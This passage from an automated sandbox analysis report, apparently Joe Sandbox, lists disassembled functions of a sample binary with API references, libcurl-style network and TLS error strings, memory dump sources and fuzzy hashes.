    • Instruction Fuzzy Hash: B7F16EB0A00219DFDB14EF98C895BEEB7B2BF45305F108269E915AB341C774AE81CF95
    Function 00678940 Relevance: 10.9, APIs: 7, Instructions: 363COMMON
    Download Yara Rule
    APIs
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006789FC
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678A1F
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678A86
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678AD6
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678B46
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678B96
    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00678DDB
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
    • String ID:
    • API String ID: 885266447-0
    • Opcode ID: c28920a4aa92e4efecad622ef2cd55c7614e3421dde6e6a1239b55235133a922
    • Instruction ID: 7fa8203a1f7c09dd260f0e0c66cf9a4b3b158f2d09e78e1f3c3c09f4a9fc57db
    • Opcode Fuzzy Hash: c28920a4aa92e4efecad622ef2cd55c7614e3421dde6e6a1239b55235133a922
    • Instruction Fuzzy Hash: 9D02D8B4A00209DFDB58DF98C594AEEB7B2FF48304F248269E809AB355DB31AD41CF55
    Function 00690550 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 361COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0069097D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: MAILINDEX$PARTIAL$SECTION$UID$UIDVALIDITY
    • API String ID: 930174750-2060961330
    • Opcode ID: 75ba9a46521e62f025f6f1032a2c7115988e3a1642ae1b5bd58c19fda4b31cc1
    • Instruction ID: a4f7ff5f62e3f11a872dfba967e783714265bd5b84ff54032511149b9ca4ab70
    • Opcode Fuzzy Hash: 75ba9a46521e62f025f6f1032a2c7115988e3a1642ae1b5bd58c19fda4b31cc1
    • Instruction Fuzzy Hash: C0E14970E04209DFEF14DBA8D994BFEB7BAAF44304F248159E415BB741C735AA80CBA5
    Function 006B41C0 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 355COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006B4610
    Strings
    • Excessive server response line length received, %zd bytes. Stripping, xrefs: 006B452C
    • cached response data too big to handle, xrefs: 006B427D
    • (, xrefs: 006B4541
    • response reading failed, xrefs: 006B435E
    • 8, xrefs: 006B4357
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: ($8$Excessive server response line length received, %zd bytes. Stripping$cached response data too big to handle$response reading failed
    • API String ID: 930174750-38606329
    • Opcode ID: 68b6df6ecd83edfb5532655f61f628ce230aeb4b78244614b33c3ea51652b656
    • Instruction ID: b7caf416aef3ef7e89f3ecac605af5edda4d7791fe0ba8ff27986a87ef31842a
    • Opcode Fuzzy Hash: 68b6df6ecd83edfb5532655f61f628ce230aeb4b78244614b33c3ea51652b656
    • Instruction Fuzzy Hash: 89F1D8B5A00109DFDB14CF98D495AEEB7B2FF48314F188259E819AB342DB35E981CB91
    Function 006BABB0 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 354COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006BB035
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: GSSAPI handshake failure (empty challenge message)$Kerberos$Kerberos$Mk
    • API String ID: 930174750-115818366
    • Opcode ID: 50c252f844abea23593d6b820cddb2e97c7da14f99f228d6df6acf14a9c7a5dd
    • Instruction ID: 6aeb1b1fc1de057cf623d85dc47e94c5f34812425cdc7bfb50df1efff9021c33
    • Opcode Fuzzy Hash: 50c252f844abea23593d6b820cddb2e97c7da14f99f228d6df6acf14a9c7a5dd
    • Instruction Fuzzy Hash: 94E16DB1A00218DFDB14DF98D885BEE77F6AF48304F118298E909AB381D7759E85CF91
    Function 0067EFE0 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 328COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067F3D2
    Strings
    • Q, xrefs: 0067F33C
    • select/poll on SSL socket, errno: %d, xrefs: 0067F2B4
    • schannel: timed out sending data (bytes sent: %zd), xrefs: 0067F2E8
    • schannel: timed out sending data (bytes sent: %zd), xrefs: 0067F251
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: Q$schannel: timed out sending data (bytes sent: %zd)$schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
    • API String ID: 930174750-1115633909
    • Opcode ID: ad102b8328f02b477e0d977b3a7b7d357037559d7feb868a070ec2343a0f0ea3
    • Instruction ID: 35cfeca575a28dbadd79f58e8a2c382dab3db512962f649f2e82cfc6ff88cc51
    • Opcode Fuzzy Hash: ad102b8328f02b477e0d977b3a7b7d357037559d7feb868a070ec2343a0f0ea3
    • Instruction Fuzzy Hash: 72D174B5900209DFDB14DF98D881FAEB7B6FF48314F248268E819AB391D735AD41CB91
    Function 0067B7D7 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 309COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8_strlen
    • String ID: %ld$.%ld$e$g
    • API String ID: 1951014933-2266449361
    • Opcode ID: 84326f6b2042cdee29f6b68bea7ffcdced396b6998f2c3f3151b0bcd79230bfb
    • Instruction ID: 0165a7dfa8e521cc46e54a6a1633d5b7bed912b9ec7e77c68c237fea68a4e8a5
    • Opcode Fuzzy Hash: 84326f6b2042cdee29f6b68bea7ffcdced396b6998f2c3f3151b0bcd79230bfb
    • Instruction Fuzzy Hash: FAE1D77090026B8BCB75CB18C891BBDB772AF45304F1481E9D41D6BB95DB309E82EF95
    Function 006A4F10 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 286COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006A52B4
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckFailureStackVars@8
    • String ID: %sAuthorization: NTLM %s$%sAuthorization: NTLM %s$\Mp$dMp$lMp
    • API String ID: 1096530042-4037171492
    • Opcode ID: 59797231091b93321633e8dda17738f1ae07df8be7f5cac6b2e0e6639df3d2f6
    • Instruction ID: aa64bc2914154b1b90e39a5a86781a64fa3fe937e4d67ca0883b5139b93d4c0e
    • Opcode Fuzzy Hash: 59797231091b93321633e8dda17738f1ae07df8be7f5cac6b2e0e6639df3d2f6
    • Instruction Fuzzy Hash: EAC13B74A00608DFDB14DF98D884BEDBBB2AF89304F148169E906AB351D735AE41CF95
    Function 0065EDA0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 242COMMON
    Download Yara Rule
    APIs
    • ___from_strstr_to_strchr.LIBCMT ref: 0065EF58
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0065F058
    Strings
    • No valid port number in connect to host string (%s), xrefs: 0065EFC1
    • Invalid IPv6 address format, xrefs: 0065EF3B
    • %25, xrefs: 0065EE8D
    • Please URL encode %% as %%25, see RFC 6874., xrefs: 0065EE9E
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8___from_strstr_to_strchr
    • String ID: %25$Invalid IPv6 address format$No valid port number in connect to host string (%s)$Please URL encode %% as %%25, see RFC 6874.
    • API String ID: 88142382-2404041592
    • Opcode ID: c485378d8432f4ba1cbd1bdc483bf2e2ea8ebeeaaded747cee2e980166d91a87
    • Instruction ID: 2d52e93ad7549a26846bc2656c9519274bcf33690ba4646d8eb180807cfed2bf
    • Opcode Fuzzy Hash: c485378d8432f4ba1cbd1bdc483bf2e2ea8ebeeaaded747cee2e980166d91a87
    • Instruction Fuzzy Hash: 8491C3B0E002599BDF18DF94C891AFEBBB3AF46316F144169ED01AB341D735AA84CB91
    Function 006824E0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 237COMMON
    Download Yara Rule
    Strings
    • SSL/TLS connection timeout, xrefs: 006826DB
    • SSL/TLS connection timeout, xrefs: 006825E3
    • SSL/TLS connection timeout, xrefs: 00682564
    • select/poll on SSL/TLS socket, errno: %d, xrefs: 006826A1
    • g, xrefs: 006827A3
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID:
    • String ID: SSL/TLS connection timeout$SSL/TLS connection timeout$SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d$g
    • API String ID: 0-2274353235
    • Opcode ID: 463575d0970aed58d13f10ae87389d2554ea36343b4cb1f67c900ce7a0b42ff1
    • Instruction ID: 70247d849191bd8bf4f809dede9bf14c816b33d3aa1154006bdd6027fc8fce45
    • Opcode Fuzzy Hash: 463575d0970aed58d13f10ae87389d2554ea36343b4cb1f67c900ce7a0b42ff1
    • Instruction Fuzzy Hash: 8FA14D74E0020AEFCB14EFA4C5A5AEEB7B2BB49314F64C258E8156B341D735DE81CB91
    Function 0068F630 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 224COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 0068F6E8
    • _strlen.LIBCMT ref: 0068F700
      • Part of subcall function 006BFA14: _RTC_Failure.LIBCMT ref: 006BFA2D
      • Part of subcall function 00662740: @_RTC_CheckStackVars@8.LIBCMT ref: 0066280E
      • Part of subcall function 006621C0: _strlen.LIBCMT ref: 006621E6
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0068F8A9
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8$Failure
    • String ID: %s?%s$7$Failed sending Gopher request
    • API String ID: 4167602484-2776782726
    • Opcode ID: 8b81d02725d0c8d4a23ab26d9a2f60facc5186976e87cc6467aa951552f17901
    • Instruction ID: 2cb6c4cd24e7964347a58b4da56827c9b21f338c1c7463f28bf28d62589f0f12
    • Opcode Fuzzy Hash: 8b81d02725d0c8d4a23ab26d9a2f60facc5186976e87cc6467aa951552f17901
    • Instruction Fuzzy Hash: B3819EB5E00218EFDB14EF98DC85BEEB7B6BF48304F144229E505A7381D735AA41CBA5
    Function 00636110 Relevance: 10.7, APIs: 7, Instructions: 213COMMON
    Download Yara Rule
    APIs
    • std::locale::_Init.LIBCPMT ref: 00636158
      • Part of subcall function 006BDC09: std::_Lockit::_Lockit.LIBCPMT ref: 006BDC1B
      • Part of subcall function 006BDC09: std::locale::_Setgloballocale.LIBCPMT ref: 006BDC36
      • Part of subcall function 006BDC09: _Yarn.LIBCPMT ref: 006BDC4C
      • Part of subcall function 006BDC09: std::_Lockit::~_Lockit.LIBCPMT ref: 006BDC8C
    • std::_Lockit::_Lockit.LIBCPMT ref: 0063616F
    • std::_Lockit::_Lockit.LIBCPMT ref: 00636191
    • std::_Lockit::~_Lockit.LIBCPMT ref: 006361B1
    • std::_Facet_Register.LIBCPMT ref: 00636216
    • std::_Lockit::~_Lockit.LIBCPMT ref: 00636232
    • __CxxThrowException@8.LIBVCRUNTIME ref: 006363C3
      • Part of subcall function 006C3ACD: RaiseException.KERNEL32(?,?,006BD8D2,?,?,?,?,?,?,?,?,006BD8D2,?,006FA3D8,00000000,?), ref: 006C3B2D
      • Part of subcall function 006C8CF4: _free.LIBCMT ref: 006C8D07
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: std::_$Lockit$Lockit::_Lockit::~_$std::locale::_$ExceptionException@8Facet_InitRaiseRegisterSetgloballocaleThrowYarn_free
    • String ID:
    • API String ID: 1940542955-0
    • Opcode ID: 6dc02e8535af0db9ff30278793586632973c6131d98df786c293a93de3acf87f
    • Instruction ID: a8a8af7da415e525108212292b3899a4a9a696e19c06e97ea8532c7db0d8bd29
    • Opcode Fuzzy Hash: 6dc02e8535af0db9ff30278793586632973c6131d98df786c293a93de3acf87f
    • Instruction Fuzzy Hash: A7915CB0900219DFDB14DFA4D884B9EBBB6BF04314F14825DE805AB382EB75AA45CB95
    Function 006A63D0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 178COMMON
    Download Yara Rule
    APIs
    • GetLastError.KERNEL32(?,00000000,?,00664304,?,00664304,?), ref: 006A63EA
    • _strncpy.LIBCMT ref: 006A66B1
    • GetLastError.KERNEL32 ref: 006A66DB
    • SetLastError.KERNEL32(?), ref: 006A66F3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ErrorLast$_strncpy
    • String ID: a$x_p
    • API String ID: 3397631897-2061801670
    • Opcode ID: 9a5c58c74213528bba9abb478e6b1e5fdb2fdff22e9f0f87da877e711761d714
    • Instruction ID: f3d975de98b06b29df9dc52aead291fb4ff7c0aea5d27cecf9994633a3cb2c0b
    • Opcode Fuzzy Hash: 9a5c58c74213528bba9abb478e6b1e5fdb2fdff22e9f0f87da877e711761d714
    • Instruction Fuzzy Hash: CA81C4F0C14719DBDF04EF95C6482AEB7F2AB5230CB18D2AAA5156A240CBBC1E459F53
    Function 006A4790 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 175COMMON
    Download Yara Rule
    APIs
    • _strlen.LIBCMT ref: 006A48C1
    • _strlen.LIBCMT ref: 006A48FB
      • Part of subcall function 006AF330: @_RTC_CheckStackVars@8.LIBCMT ref: 006AF894
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: _strlen$CheckStackVars@8
    • String ID: (Lp$0Lp$Negotiate$Negotiate auth restarted
    • API String ID: 3286693010-3820949398
    • Opcode ID: f0954c1ee337dc4a1014b2c8bbd7aeeaecdf265d373f48db89e78ab0934d633d
    • Instruction ID: 239d7ca73f2bd30ab3596c8c3c11050eb0bc3b354c09d401b7c80756766081a1
    • Opcode Fuzzy Hash: f0954c1ee337dc4a1014b2c8bbd7aeeaecdf265d373f48db89e78ab0934d633d
    • Instruction Fuzzy Hash: 6E7117B4E01249DBDB04DF98D880BEEBBB2BF89304F148169E905AB341D775AE41CF95
    Function 006665F0 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
    Download Yara Rule
    APIs
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000002,00000004,?,?), ref: 0066674B
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000001,00000004,?,?), ref: 00666772
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000020,00000005,?,?), ref: 00666799
    • VerSetConditionMask.KERNEL32(00000002,00666495,00000010,00000005,?,?), ref: 006667C0
    • VerSetConditionMask.KERNEL32(00000000,00666495,00000008,00000001,?,?), ref: 006667E7
    • VerifyVersionInfoA.KERNEL32(0000009C,00000033,00000000,00666495), ref: 0066680D
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0066682F
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: ConditionMask$CheckInfoStackVars@8VerifyVersion
    • String ID:
    • API String ID: 525484876-0
    • Opcode ID: 91b54f3a9b88a5fa8170005394014d4cfd93be440492cbb6e4d806b3681b8ced
    • Instruction ID: 32940fef7d06775b1b46bcf7615af65779cc97cac09608f4b97dbb1f89f9ff57
    • Opcode Fuzzy Hash: 91b54f3a9b88a5fa8170005394014d4cfd93be440492cbb6e4d806b3681b8ced
    • Instruction Fuzzy Hash: 37718071D083A8DEDB50DB68DC45BEEBBBAAB46304F0441DDE44867281C7B55E84CFA2
    Function 0067F450 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 157encryptionCOMMON
    Download Yara Rule
    APIs
    • CertFreeCertificateContext.CRYPT32(00000000), ref: 0067F607
    • @_RTC_CheckStackVars@8.LIBCMT ref: 0067F621
    Strings
    • Z, xrefs: 0067F499
    • SSL: public key does not match pinned public key!, xrefs: 0067F5E2
    • schannel: Failed to read remote certificate context: %s, xrefs: 0067F4F8
    • SSL: failed retrieving public key from server certificate, xrefs: 0067F59B
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CertCertificateCheckContextFreeStackVars@8
    • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key!$Z$schannel: Failed to read remote certificate context: %s
    • API String ID: 833836643-3483829282
    • Opcode ID: a4e9a94445a6755b2ca81217a165e0dd11998f5dd1a3ca85aa06e4fd96f1f3ad
    • Instruction ID: 61b1bbdecfc064cb4bfe05ea5a716a1a10a9942dc4c2f1b3fb339837aba9b7cd
    • Opcode Fuzzy Hash: a4e9a94445a6755b2ca81217a165e0dd11998f5dd1a3ca85aa06e4fd96f1f3ad
    • Instruction Fuzzy Hash: 3C514BB5A00109DFDB14DF98D981FEEB3F6AB49304F1081A8E909A7351D735AE85CFA1
    Function 00692250 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 145COMMON
    Download Yara Rule
    APIs
    • @_RTC_CheckStackVars@8.LIBCMT ref: 006923EC
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1265264531.0000000000631000.00000020.00000001.01000000.00000005.sdmp, Offset: 00630000, based on PE: true
    • Associated: 00000002.00000002.1265243328.0000000000630000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265564750.00000000006FD000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265586826.0000000000709000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000002.00000002.1265620731.000000000070C000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_630000__J8156NOVDEC.jbxd
    Similarity
    • API ID: CheckStackVars@8
    • String ID: *$C$Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$Select failed
    • API String ID: 930174750-4022285532
    • Opcode ID: 6ea789f842a624eb9dca582ee882b566ad369e5236b18be2f40184e49a5a981f
    • Instruction ID: 44aeb29d668c78992d98028a21407d6c571a920268bb0b1d890be1ae14ea688a
    • Opcode Fuzzy Hash: 6ea789f842a624eb9dca582ee882b566ad369e5236b18be2f40184e49a5a981f
    • Instruction Fuzzy Hash: DC51A1B5D00109EFCF04DF98D895AAEB7BABF48304F108569E8066B351DB35EE41CBA5
